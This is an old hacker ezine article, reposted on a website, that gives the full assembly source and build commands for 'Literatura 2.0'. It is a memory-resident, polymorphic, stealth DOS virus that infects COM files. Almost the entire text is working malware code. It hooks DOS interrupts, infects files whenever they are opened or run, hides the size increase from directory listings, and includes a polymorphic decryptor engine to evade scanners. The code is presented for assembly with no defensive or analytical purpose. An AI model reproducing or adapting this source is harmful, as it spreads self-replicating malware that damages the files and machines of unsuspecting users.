Copy Link
Add to Bookmark
Report

Xine - issue #3 - Phile 208

eZine's profile picture
Published in 
Xine
 · 7 months ago

 
/-----------------------------\
| Xine - issue #3 - Phile 208 |
\-----------------------------/



Comment %
Ü
Û Û V I R U S Û
Û ßÜÛÜ ÜÜ Ü Ü ÜÜ ÜÛÜ Ü Ü ÜÜ
Û Û Û ÛÜÜß Ûß Û Û Û Û Û Ûß Û Û ÜßßÜ ÜßßÜ
Û Û Û Û Û Û Û Û Û Û Û Û Û Üß Û Û
ßßß ß ß ßßß ß ßßßß ß ßß ß ßßßß ßßß ß ßß
TSR size stealth polymorphic COM midfile fast infector
Programmed by Int13h/iKx in Paraguay, South America

Original bytes of the hoste are stored in an encrypted form at EOF.
Virus code is in a random file position, a polymorphic header gives
control to the decryptor generated by the polymorphic engine.
Greets to Dark Avenger, who was the piooner in midfile infection,
with his great Commander Bomber. Also greetz to all my IRC-friends.

tasm litera2 /m3
tlink litera2 /t
%

.Model Tiny
.Code
Org 100h
Jumps

Heap equ (offset Final-offset OpaLaVya)
Largor equ (offset OpaLaVya-offset Literatura)
Parrafos1 equ ((Largor+Heap+15)/16)+1
Parrafos2 equ ((Largor+Heap+15)/16)
LDecryptor equ (offset encriptora_1-offset instruccion_2)

LITERATURA:
Basura db 33d dup(090h) ; Space where we will generate
Modificar: ; the polymorphic decryptor
int 3
call Delta
Delta: pop bp
sub bp,offset Delta

mov ax,'i1'
int 21h
cmp ax,'3!'
je LiteraturaIsAlreadySuckingMemory

mov ah,30h
int 21h

cmp al,7
jae LiteraturaIsAlreadySuckingMemory

mov ax,3521h
int 21h
mov word ptr [bp+Vieja21h],bx
mov word ptr [bp+Vieja21h+2],es

mov ax,ds
dec ax
mov es,ax
mov ax,es:[3]
sub ax,Parrafos1
xchg bx,ax

push ds
pop es

mov ah,4ah
int 21h

mov ah,48h
mov bx,Parrafos2
int 21h

dec ax
mov es,ax
mov word ptr es:[1],8
inc ax
mov es,ax
xor di,di

push cs
pop ds

lea si,[bp+offset Literatura]
mov cx,Largor
rep movsb

push es
pop ds
mov ax,2521h
mov dx,(offset Literatura21h-100h)
int 21h


LiteraturaIsAlreadySuckingMemory:
push cs cs
pop ds es

cld
lea si,[bp+offset Primitivos]
mov di,100h
push di
mov cx,15
rep movsw

lea si,[bp+offset Copier]
mov di,06ch
mov ax,di
mov cx,5
repe movsw
movsb

db 0bfh
Reales dw 0
add di,100h
mov cx,Largor
Descifrar_Bytes_Originales:
dw 3580h
Llave db 0
inc di
loop Descifrar_Bytes_Originales

mov cx,Largor
db 0beh
Origen dw 0
add si,100h
db 0bfh
Destino dw 0
add di,100h
xor bx,bx
xor dx,dx
sub bp,bp
jmp ax


Copier: repe movsb
xor si,si
sub di,di
xor ax,ax
sub cx,cx
ret


db " [LiTeRaTuRa 2.0 by Int13h] - MadE in ParaguaY "


Metodo1:db 0e9h
Despla1 dw 666

Metodo2:db 0bbh
Despla2 dw 666
push bx
ret

Metodo3:db 0e8h
Despla3 dw 666

Metodo4:db 0bbh
Despla4 dw 666
jmp bx

Metodo5:db 0bbh
Despla5 dw 666
call bx

Metodo6:push cs
db 0bbh
Despla6 dw 666
push bx
retf


STEALTH1:
xor ah,0bah
pushf
call dword ptr cs:[Vieja21h-100h]
test al,al
jnz Erebo

push ax bx es

mov ah,51h
int 21h

mov es,bx
cmp bx,es:[16h]
jne Fuera

mov bx,dx
mov al,[bx]
push ax

mov ah,2fh
int 21h
pop ax
inc al
jnz FCBComun
add bx,7
FCBComun:
mov al,byte ptr es:[bx+17h]
and al,00011111b
cmp al,00011110b
jne Fuera

cmp word ptr es:[bx+1dh],Largor
ja Sustraer

cmp word ptr es:[bx+1fh],0
je Fuera
Sustraer:sub word ptr es:[bx+1dh],Largor
Fuera: pop es bx ax
Erebo: retf 2



LITERATURA21h:
cmp ax,'i1' ; Residence Checking
je Chequeo
xor ah,0bah
cmp ah,(03dh xor 0bah) ; File Opening?
je InfectFile
cmp ah,(04bh xor 0bah) ; Program loading?
je InfectFile
cmp ah,(11h xor 0bah) ; FCB find first
je Stealth1
cmp ah,(12h xor 0bah) ; FCB find next
je Stealth1
cmp ah,(4eh xor 0bah) ; DTA find first
je Stealth2
cmp ah,(4fh xor 0bah) ; DTA find next
je Stealth2
cmp ax,0d600h ; Extended Open
je InfectFile
cmp ah,(056h xor 0bah) ; Rename
je InfectFile
cmp ah,(041h xor 0bah) ; Delete
je InfectFile
cmp ah,(043h xor 0bah) ; Get/Set attributes
je InfectFile
cmp ax,08f21h ; Camuflar 3521h
je Ocultar21h_A
cmp ax,09f21h ; Camuflar 2521h
je Ocultar21h_B
xor ah,0bah
Interrupcion_21h:
db 0eah
Vieja21h dd 0
Chequeo:mov ax,'3!'
iret



OCULTAR21h_A:
xor ah,0bah
mov bx,word ptr cs:[(Vieja21h-100h)]
mov es,word ptr cs:[(Vieja21h-100h)+2]
iret


OCULTAR21h_B:
xor ah,0bah
mov word ptr cs:[(Vieja21h-100h)],dx
mov word ptr cs:[(Vieja21h-100h)+2],ds
iret



STEALTH2:
xor ah,0bah
pushf
call dword ptr cs:[Vieja21h-100h]
jc Infierno

pushf
push ax di es bx

mov ah,2fh
int 21h

mov ax,es:[bx+16h]
and al,00011111b
cmp al,00011110b
jne Paso

cmp word ptr es:[bx+1ah],Largor
jb Paso
sub word ptr es:[bx+1ah],Largor

Paso: pop bx es di ax
popf
Infierno:
retf 2


Primitivos db 30d dup(0c3h)


SoloPopear:
jmp PopIt



INFECTFILE:
xor ah,0bah
push ax bx cx dx si di ds es

cmp ax,6c00h
jne Apertura_Standard

cmp dx,0001
jne SoloPopear

mov dx,si

Apertura_Standard:
push dx ds
mov ax,3524h
int 21h
mov word ptr cs:[Real24h-100h],bx
mov word ptr cs:[(Real24h-100h)+2],es

push cs
pop ds

mov ax,2524h
mov dx,offset Handler24h-100h
int 21h

pop ds dx

push ds
pop es
cld
mov di,dx
mov cx,128
mov al,'.'
repne scasb
jne Popeo

mov ax,word ptr es:[di-3]
or ax,02020h
cmp ax,'dn'
je Popeo

xchg si,di
lodsw
or ax,2020h
cmp ax,'oc'
jne Popeo
lodsb
or al,20h
cmp al,'m'
jne Popeo

mov ax,3d02h
pushf
call dword ptr cs:[Vieja21h-100h]
jc Popeo
xchg bx,ax

mov ax,5700h
int 21h
mov word ptr cs:[(Hora-100h)],cx
mov word ptr cs:[(Fecha-100h)],dx
and cl,00011111b
cmp cl,00011110b
je Closeo

push cs cs
pop ds es

mov ah,03fh
mov dx,(offset Primitivos-100h)
mov cx,30
int 21h

mov si,dx
mov ax,[si]
add ah,al
cmp ah,167d
je Closeo

call PunteroFin

and dx,dx
jnz Closeo

cmp ax,60000d
ja Closeo

cmp ax,3000d
jbe Closeo

mov cx,ax
sub cx,(Largor+40)

call Obtener_Numero_Aleatorio
cmp ax,40
ja Okis
mov ax,666

Okis: sub ax,3
mov word ptr [Despla1-100h],ax
mov word ptr [Despla2-100h],ax
mov word ptr [Despla3-100h],ax
mov word ptr [Despla4-100h],ax
mov word ptr [Despla5-100h],ax
mov word ptr [Despla6-100h],ax
add ax,3

mov dx,ax
push dx
mov word ptr [Destino-100h],dx
xor cx,cx
mov ax,4200h
int 21h

mov ah,3fh
mov dx,offset Vafer-100h
mov cx,Largor
int 21h

call PunteroFin

mov word ptr [Reales-100h],ax
mov word ptr [Origen-100h],ax

in al,40h
or al,al
jnz NoCero
inc al
NoCero: mov byte ptr [Llave-100h],al

mov si,offset Vafer-100h
mov cx,Largor
Cifrar_Bytes_Originales:
xor byte ptr [si],al
inc si
loop Cifrar_Bytes_Originales

mov ah,40h
mov cx,Largor
mov dx,offset Vafer-100h
int 21h

call PunteroInicio
mov di,(offset Polymorphic_Header-100h)
mov cx,30
Generate_Garbage:
push cx
push di
mov cx,40
call Obtener_Numero_Aleatorio
mov si,(offset Opcodes_de_un_byte-100h)
add si,ax
pop di
movsb
pop cx
loop Generate_Garbage

mov cx,7
call Obtener_Numero_Aleatorio

call Generate_Polymorphic_Header

mov ah,40h
mov cx,30
mov dx,(offset Polymorphic_Header-100h)
int 21h

pop dx
push dx
xor cx,cx
mov ax,4200h
int 21h

mov si,offset Modificar-100h
mov di,offset Vafer-100h
mov cx,Largor-33d
pop bp
add bp,100h
push bx
call Ygramul
pop bx

mov ah,40h
mov dx,offset Vafer-100h
int 21h

db 0b9h
Hora dw 0
and cl,11100000b
or cl,00011110b
db 0bah
Fecha dw 0
mov ax,5701h
int 21h

Closeo: mov ah,3eh
int 21h

Popeo: push cs
pop ds

lds dword ptr dx,[Real24h-100h]
mov ax,2524h
int 21h

PopIt: pop es ds di si dx cx bx ax
jmp Interrupcion_21h


PunteroInicio:
mov ax,04200h
jmp short Mover
PunteroFin:
mov ax,04202h
Mover: xor cx,cx
cwd
int 21h
ret


Handler24h:
mov al,03
iret


Generate_Polymorphic_Header:
mov byte ptr [Modificar-100h],0cch
cmp ax,2
je UsarMetodo2
cmp ax,3
je UsarMetodo3
cmp ax,4
je UsarMetodo4
cmp ax,5
je UsarMetodo5
cmp ax,6
je UsarMetodo6
call Arreglo_General
mov si,offset Metodo1-100h
movsw
movsb
ret

UsarMetodo2:
call Arreglo_General
mov si,offset Metodo2-100h
movsw
movsw
movsb
ret

UsarMetodo3:
call Arreglo_General
mov byte ptr [Modificar-100h],05dh
mov si,offset Metodo3-100h
movsw
movsb
ret

UsarMetodo4:
call Arreglo_General
mov si,offset Metodo4-100h
movsw
movsw
movsb
ret

UsarMetodo5:
call Arreglo_General
mov byte ptr [Modificar-100h],058h
mov si,offset Metodo5-100h
movsw
movsw
movsb
ret

UsarMetodo6:
call Arreglo_General
mov si,offset Metodo6-100h
movsw
movsw
movsw
ret


Arreglo_General:
mov cx,23
call Obtener_Numero_Aleatorio
sub word ptr [Despla1-100h],ax
add word ptr [Despla2-100h],103h
sub word ptr [Despla3-100h],ax
add word ptr [Despla4-100h],103h
add word ptr [Despla5-100h],103h
add word ptr [Despla6-100h],103h
mov di,offset Polymorphic_Header-100h
add di,ax
ret

; Cheesy engine used to generate random fixed-size decryptors
; Uses xor/sub/add/not/neg/ror/rol/inc/dec for enc/decryption
Ygramul:
mov word ptr [LiteCX1-100h],cx
mov word ptr [LiteCX2-100h],cx
mov word ptr [LiteBP-100h],bp
mov word ptr [LiteES-100h],es
mov word ptr [LiteSI-100h],si
mov word ptr [LiteDI-100h],di

mov si,offset ClaveEnc_1-100h
mov di,offset ClaveDec_1-100h

in ax,40h
test al,al
jnz Pasamos_al
inc al
Pasamos_al:
and ah,ah
jnz Pasamos_ah
dec ah
Pasamos_ah:
mov byte ptr [si+3],ah
mov byte ptr [di+3],ah
mov byte ptr [si],al
mov byte ptr [di],al
in al,40h
or al,al
jnz Listo
inc al
Listo: mov byte ptr [si+6],al
mov byte ptr [di+6],al

push cs
pop es
mov di,offset Encriptora_4-100h+2
mov bx,offset Opcodes_de_un_byte-100h
mov si,6

Rellenar:
mov cx,17
call Obtener_Numero_Aleatorio
xlat
stosb
inc di
inc di
dec si
jnz Rellenar

mov cx,127
call obtener_numero_aleatorio
sub word ptr [LiteBP-100h],ax
mov byte ptr [Desplazamiento1-100h],al
mov byte ptr [Desplazamiento2-100h],al

mov cx,4
call Obtener_Numero_Aleatorio
mov byte ptr [Indice-100h],al
mov si,offset Instruccion_2-100h
mov di,offset Instruccion_3-100h+2
mov bp,offset Instruccion_4-100h

cmp al,1
jnz No_fue_Uno
mov byte ptr [si],0beh
mov byte ptr [di],07ch
mov byte ptr ds:[bp+2],07ch
mov byte ptr ds:[bp+4],046h
jmp short Seleccionar_Contador
No_fue_Uno:
cmp al,2
jnz No_fue_Dos
mov byte ptr [si],0bfh
mov byte ptr [di],07dh
mov byte ptr ds:[bp+2],07dh
mov byte ptr ds:[bp+4],047h
jmp short Seleccionar_Contador
No_fue_Dos:
cmp al,3
jnz Fue_Cuatro
mov byte ptr [si],0bdh
mov byte ptr [di],07eh
mov byte ptr ds:[bp+2],07eh
mov byte ptr ds:[bp+4],045h
jmp short Seleccionar_Contador
Fue_Cuatro:
mov byte ptr [si],0bbh
mov byte ptr [di],07fh
mov byte ptr ds:[bp+2],07fh
mov byte ptr ds:[bp+4],043h

Seleccionar_Contador:
mov cx,6
call Obtener_Numero_Aleatorio
mov ah,byte ptr [Indice-100h]
cmp ah,al
je Seleccionar_Contador
mov byte ptr [Contador-100h],al

mov si,offset Instruccion_1-100h
mov di,offset Instruccion_6-100h
cmp al,1
jnz Uno_no_fue
mov byte ptr [si],0beh
mov byte ptr [di],04eh
jmp short Mutar_registros_de_trabajo
Uno_no_fue:
cmp al,2
jne Dos_no_fue
mov byte ptr [si],0bfh
mov byte ptr [di],04fh
jmp short Mutar_registros_de_trabajo
Dos_no_fue:
cmp al,3
jne Tres_no_fue
mov byte ptr [si],0bdh
mov byte ptr [di],04dh
jmp short Mutar_registros_de_trabajo
Tres_no_fue:
cmp al,4
jne Cuatro_no_fue
mov byte ptr [si],0bbh
mov byte ptr [di],04bh
jmp short Mutar_registros_de_trabajo
Cuatro_no_fue:
cmp al,5
jne Seis_fue
mov byte ptr [si],0b9h
mov byte ptr [di],049h
jmp short Mutar_registros_de_trabajo
Seis_fue:
mov byte ptr [si],0bah
mov byte ptr [di],04ah

Mutar_registros_de_Trabajo:
mov cx,6
call Obtener_Numero_Aleatorio
mov byte ptr [Carga-100h],al
mov cl,byte ptr [Indice-100h]
mov ch,byte ptr [Contador-100h]
cmp al,2
ja No_CX
cmp ch,5
je Mutar_registros_de_Trabajo
jmp short Almacenar
No_CX: cmp al,4
ja No_DX
cmp ch,6
je Mutar_registros_de_Trabajo
jmp short Almacenar
No_DX: cmp cl,4
je Mutar_registros_de_Trabajo
cmp ch,4
je Mutar_registros_de_Trabajo


Almacenar:
and byte ptr [Instruccion_3-100h+2],047h
and byte ptr [Instruccion_4-100h+2],047h

cmp al,1
jnz Uno_no_ha_sido
mov al,00101000b
jmp short ORearlo
Uno_no_ha_sido:
cmp al,2
jne Dos_no_ha_sido
mov al,00001000b
jmp short ORearlo
Dos_no_ha_sido:
cmp al,3
jne Tres_no_ha_sido
mov al,00110000b
jmp short ORearlo
Tres_no_ha_sido:
cmp al,4
jne Cuatro_no_ha_sido
mov al,00010000b
jmp short ORearlo
Cuatro_no_ha_sido:
cmp al,5
jne Fue_Six
mov al,00111000b
jmp short ORearlo
Fue_Six:mov al,00011000b

ORearlo:mov byte ptr [Orear-100h],al
or byte ptr [Instruccion_3-100h+2],al
or byte ptr [Instruccion_4-100h+2],al

mov di,offset Encriptar-100h
mov ax,15
call Llenar_con_basura

mov di,offset Buffer-100h
mov ax,15
call Llenar_con_basura

mov cx,5
call Obtener_Numero_Aleatorio
mov byte ptr [Cantidad-100h],al
mov bp,ax

mov di,offset Encriptar-100h

xor dx,dx
Seleccionar_Instrucciones:
mov si,offset Encriptora_1-100h-3
mov cx,9
call Obtener_Numero_Aleatorio
mov cl,3
mul cl
add si,ax
movsw
movsb
push si
push di
add si,24
mov di,offset Buffer-100h
add di,dx
add dx,3
movsw
movsb
pop di
pop si
dec bp
jnz Seleccionar_Instrucciones

mov bp,3
mov si,offset Encriptar-100h

mov cx,5
Inversor:
mov di,offset Instruccion_4-100h
sub di,bp
add bp,3
movsw
movsb
loop Inversor

mov si,offset Buffer-100h
mov di,offset Encriptar-100h
mov cx,15
rep movsb

mov si,offset Instruccion_4-100h-2
mov al,byte ptr [Orear-100h]
mov cl,3
shr al,cl
xor cx,cx
mov cl,byte ptr [Cantidad-100h]
Proceder:
and byte ptr [si],11111000b
or byte ptr [si],al
sub si,3
loop Proceder


db 0bfh
LiteDI dw 0
db 0b8h
LiteES dw 0
mov es,ax
db 0bah
LiteCX1 dw 0
mov cx,LDecryptor
add word ptr [LiteBP-100h],cx
push cx
mov si,offset Instruccion_2-100h
rep movsb
pop cx
add cx,dx
db 0beh
LiteSI dw 0

Realizar_la_encripcion:
mov bh,byte ptr ds:[si]
Encriptar db 15 dup(0fbh)
mov byte ptr es:[di],bh
inc si
inc di
dec dx
jnz Realizar_la_encripcion
ret


Instruccion_2: db 0beh
LiteBP dw 0
Instruccion_1: db 0bah
LiteCX2 dw 0
Instruccion_3: db 02eh,08ah,07ch
Desplazamiento1 db 0
Desencriptar db 15 dup(0f8h)
Instruccion_4: db 02eh,088h,07ch
Desplazamiento2 db 0
Instruccion_5: inc si
Instruccion_6: dec dx
jnz Instruccion_3


Encriptora_1: db 080h,0c7h
ClaveEnc_1 db 0
Encriptora_2: db 080h,0efh
ClaveEnc_2 db 0
Encriptora_3: db 080h,0f7h
ClaveEnc_3 db 0
Encriptora_4: inc bh
int 3
Encriptora_5: dec bh
sti
Encriptora_6: not bh
stc
Encriptora_7: neg bh
cld
Encriptora_8: ror bh,1
cmc
Encriptora_9: rol bh,1
nop

Desencriptora_1: db 080h,0efh
ClaveDec_1 db 0
Desencriptora_2: db 080h,0c7h
ClaveDec_2 db 0
Desencriptora_3: db 080h,0f7h
ClaveDec_3 db 0
Desencriptora_4: dec bh
nop
Desencriptora_5: inc bh
stc
Desencriptora_6: not bh
clc
Desencriptora_7: neg bh
sti
Desencriptora_8: rol bh,1
cmc
Desencriptora_9: ror bh,1
Opcodes_de_un_byte:
cld
db 090h,0cch,0fch,0fbh,0f8h,0f9h,0f5h,037h,02fh,027h
db 03fh,0ceh,098h,09fh,09bh,040h,048h,043h,04bh,041h
db 049h,042h,04ah,046h,04eh,047h,04fh,045h,04dh,093h
db 099h,091h,092h,095h,096h,097h,0ech,0edh,0d7h


Obtener_Numero_Aleatorio:
push dx
push di
in ax,40h
mov dx,106
mul dx
add ax,1283
mov di,6075
adc dx,0
div di
mov ax,dx
mul cx
div di
pop di
pop dx
inc ax
ret


Llenar_con_basura:
mov bp,ax
Repetir:mov si,offset Opcodes_de_un_byte-100h
mov cx,17
call Obtener_Numero_Aleatorio
add si,ax
movsb
dec bp
jnz Repetir
ret


Cantidad db 0
Orear db 0
Buffer:
Indice db 0
Contador db 0
Carga db 0
db 13 dup(90h)

OpaLaVya:
Real24h dd 0
Polymorphic_Header db 30 dup(0)
Vafer db Largor dup(0)
Final label byte

End LITERATURA

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT